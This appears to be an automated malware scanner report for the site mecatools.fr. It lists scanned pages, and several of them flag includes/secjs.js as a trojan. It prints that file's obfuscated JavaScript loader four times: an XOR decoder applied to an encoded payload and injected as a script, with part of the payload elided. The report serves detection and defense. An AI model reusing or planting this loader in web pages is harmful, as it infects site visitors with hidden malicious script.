New scan:

Malware Scanner report for mecatools.fr

Malicious/Suspicious/Total urls checked
4/0/15
4 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://mecatools.fr/
200 OK
Content-Length: 34957
Content-Type: text/html
clean
http://mecatools.fr/./includes/fonctions.js
200 OK
Content-Length: 5852
Content-Type: application/javascript
clean
http://pagead2.googlesyndication.com/pagead/show_ads.js
200 OK
Content-Length: 21967
Content-Type: text/javascript
clean
http://mecatools.fr/includes/secjs.js
200 OK
Content-Length: 2827
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.text=dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AD%0F%B3%CE%A5%A7B1%01w%94%03%C3r%D3%D8%A8H%03*%1B%3BcN%BE%7B%D1t%EEA%E0%A5%B7%BC%F1%3Ee%863D%CB%0C%E6%7F%FB%99%25%89%FF%20%3F%3CW%1F%3Db%A2%F4%24s%97%85%A7%3Fs%C1%9C%95%8E%F1%94%FBb.3GD%82%BD%CE%3E%AEO%B5N3%D6%AD%CFI%F9V%BBY%C6%8BH%E5%AB%06E%F6w%A7Ty%E4*%29*%FD%B5%206%EF%DAN%1Cr%8A%E7%B2wy%F1%1A%1C%A0%21%8B%D5%AA%F4%18%3EK%DD%3C%1D%A3%E
... 1830 bytes are skipped ...
%81%B0%20ke%B6yj%08E%23%7EoS%5D%0F%0E%B4%F2%D8%CA%8E%C0j%C2jY%F7%BA%17-%AAO%5Bj%B2%EE%C83%A6%9F%F61%E7%25%90%D5%3A%23Sa%F3%B8X.%AFAj%04%10%C0%D5%AA%BD%16%D9M%23%CD%AE%9D%01%7Chl%86U%DD%8D%F69%E4%F5CV%8Cs%25%BA@F%9E%A3%D5%85e%A1%16%0D%F5%21%CAj%82%BF%BE%FF%06%F3%92%E5w%80%8C%26%A1%83%C8%A9j%DC%864%CAl%17%F8m%81%04%F6%7C%23%A4%F1"));h.appendChild(s);function dec(txt){var n=42;var p="";for(var i=0;i<txt.length;i++){n=(211*n+1283)%6085;p+=String.fromCharCode(txt.charCodeAt(i)^(n%255));}return p;}

Antivirus reports:

NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm

http://mecatools.fr/./
200 OK
Content-Length: 34936
Content-Type: text/html
clean
http://mecatools.fr/././includes/fonctions.js
200 OK
Content-Length: 5852
Content-Type: application/javascript
clean
http://mecatools.fr/./includes/secjs.js
200 OK
Content-Length: 2827
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.text=dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AD%0F%B3%CE%A5%A7B1%01w%94%03%C3r%D3%D8%A8H%03*%1B%3BcN%BE%7B%D1t%EEA%E0%A5%B7%BC%F1%3Ee%863D%CB%0C%E6%7F%FB%99%25%89%FF%20%3F%3CW%1F%3Db%A2%F4%24s%97%85%A7%3Fs%C1%9C%95%8E%F1%94%FBb.3GD%82%BD%CE%3E%AEO%B5N3%D6%AD%CFI%F9V%BBY%C6%8BH%E5%AB%06E%F6w%A7Ty%E4*%29*%FD%B5%206%EF%DAN%1Cr%8A%E7%B2wy%F1%1A%1C%A0%21%8B%D5%AA%F4%18%3EK%DD%3C%1D%A3%E
... 1830 bytes are skipped ...
%81%B0%20ke%B6yj%08E%23%7EoS%5D%0F%0E%B4%F2%D8%CA%8E%C0j%C2jY%F7%BA%17-%AAO%5Bj%B2%EE%C83%A6%9F%F61%E7%25%90%D5%3A%23Sa%F3%B8X.%AFAj%04%10%C0%D5%AA%BD%16%D9M%23%CD%AE%9D%01%7Chl%86U%DD%8D%F69%E4%F5CV%8Cs%25%BA@F%9E%A3%D5%85e%A1%16%0D%F5%21%CAj%82%BF%BE%FF%06%F3%92%E5w%80%8C%26%A1%83%C8%A9j%DC%864%CAl%17%F8m%81%04%F6%7C%23%A4%F1"));h.appendChild(s);function dec(txt){var n=42;var p="";for(var i=0;i<txt.length;i++){n=(211*n+1283)%6085;p+=String.fromCharCode(txt.charCodeAt(i)^(n%255));}return p;}

Antivirus reports:

NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm

http://mecatools.fr/././
200 OK
Content-Length: 34936
Content-Type: text/html
clean
http://mecatools.fr/./././includes/fonctions.js
200 OK
Content-Length: 5852
Content-Type: application/javascript
clean
http://mecatools.fr/././includes/secjs.js
200 OK
Content-Length: 2827
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.text=dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AD%0F%B3%CE%A5%A7B1%01w%94%03%C3r%D3%D8%A8H%03*%1B%3BcN%BE%7B%D1t%EEA%E0%A5%B7%BC%F1%3Ee%863D%CB%0C%E6%7F%FB%99%25%89%FF%20%3F%3CW%1F%3Db%A2%F4%24s%97%85%A7%3Fs%C1%9C%95%8E%F1%94%FBb.3GD%82%BD%CE%3E%AEO%B5N3%D6%AD%CFI%F9V%BBY%C6%8BH%E5%AB%06E%F6w%A7Ty%E4*%29*%FD%B5%206%EF%DAN%1Cr%8A%E7%B2wy%F1%1A%1C%A0%21%8B%D5%AA%F4%18%3EK%DD%3C%1D%A3%E
... 1830 bytes are skipped ...
%81%B0%20ke%B6yj%08E%23%7EoS%5D%0F%0E%B4%F2%D8%CA%8E%C0j%C2jY%F7%BA%17-%AAO%5Bj%B2%EE%C83%A6%9F%F61%E7%25%90%D5%3A%23Sa%F3%B8X.%AFAj%04%10%C0%D5%AA%BD%16%D9M%23%CD%AE%9D%01%7Chl%86U%DD%8D%F69%E4%F5CV%8Cs%25%BA@F%9E%A3%D5%85e%A1%16%0D%F5%21%CAj%82%BF%BE%FF%06%F3%92%E5w%80%8C%26%A1%83%C8%A9j%DC%864%CAl%17%F8m%81%04%F6%7C%23%A4%F1"));h.appendChild(s);function dec(txt){var n=42;var p="";for(var i=0;i<txt.length;i++){n=(211*n+1283)%6085;p+=String.fromCharCode(txt.charCodeAt(i)^(n%255));}return p;}

Antivirus reports:

NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm

http://mecatools.fr/./././
200 OK
Content-Length: 34943
Content-Type: text/html
clean
http://mecatools.fr/././././includes/fonctions.js
200 OK
Content-Length: 5852
Content-Type: application/javascript
clean
http://mecatools.fr/./././includes/secjs.js
200 OK
Content-Length: 2827
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var h=document.getElementsByTagName('head')[0];var s=document.createElement('script');s.type='text/javascript';s.text=dec(unescape("%8D%C7o%CD%D8U%AE%A0%DE%E3%60AD%0F%B3%CE%A5%A7B1%01w%94%03%C3r%D3%D8%A8H%03*%1B%3BcN%BE%7B%D1t%EEA%E0%A5%B7%BC%F1%3Ee%863D%CB%0C%E6%7F%FB%99%25%89%FF%20%3F%3CW%1F%3Db%A2%F4%24s%97%85%A7%3Fs%C1%9C%95%8E%F1%94%FBb.3GD%82%BD%CE%3E%AEO%B5N3%D6%AD%CFI%F9V%BBY%C6%8BH%E5%AB%06E%F6w%A7Ty%E4*%29*%FD%B5%206%EF%DAN%1Cr%8A%E7%B2wy%F1%1A%1C%A0%21%8B%D5%AA%F4%18%3EK%DD%3C%1D%A3%E
... 1830 bytes are skipped ...
%81%B0%20ke%B6yj%08E%23%7EoS%5D%0F%0E%B4%F2%D8%CA%8E%C0j%C2jY%F7%BA%17-%AAO%5Bj%B2%EE%C83%A6%9F%F61%E7%25%90%D5%3A%23Sa%F3%B8X.%AFAj%04%10%C0%D5%AA%BD%16%D9M%23%CD%AE%9D%01%7Chl%86U%DD%8D%F69%E4%F5CV%8Cs%25%BA@F%9E%A3%D5%85e%A1%16%0D%F5%21%CAj%82%BF%BE%FF%06%F3%92%E5w%80%8C%26%A1%83%C8%A9j%DC%864%CAl%17%F8m%81%04%F6%7C%23%A4%F1"));h.appendChild(s);function dec(txt){var n=42;var p="";for(var i=0;i<txt.length;i++){n=(211*n+1283)%6085;p+=String.fromCharCode(txt.charCodeAt(i)^(n%255));}return p;}

Antivirus reports:

NANO-Antivirus
Trojan.Script.Heuristic-js.iacgm

http://mecatools.fr/././././
200 OK
Content-Length: 34957
Content-Type: text/html
clean
http://mecatools.fr/./././././includes/fonctions.js
200 OK
Content-Length: 5852
Content-Type: application/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mecatools.fr

Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 17 Apr 2014 22:26:32 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP=CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE
Set-Cookie: 60gpBAK=R1224196865; path=/; expires=Thu, 17-Apr-2014 23:33:52 GMT
Set-Cookie: 60gp=R717391862; path=/; expires=Thu, 17-Apr-2014 23:31:54 GMT
Set-Cookie: PHPSESSID=b0e82414f54577d84521838dff43d0ad; path=/
Set-Cookie: javascript=deleted; expires=Wed, 17-Apr-2013 22:26:31 GMT
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: mecatools.fr
Referer: http://www.google.com/search?q=mecatools.fr

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mecatools.fr

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mecatools.fr/

Result: mecatools.fr is not infected or malware details are not published yet.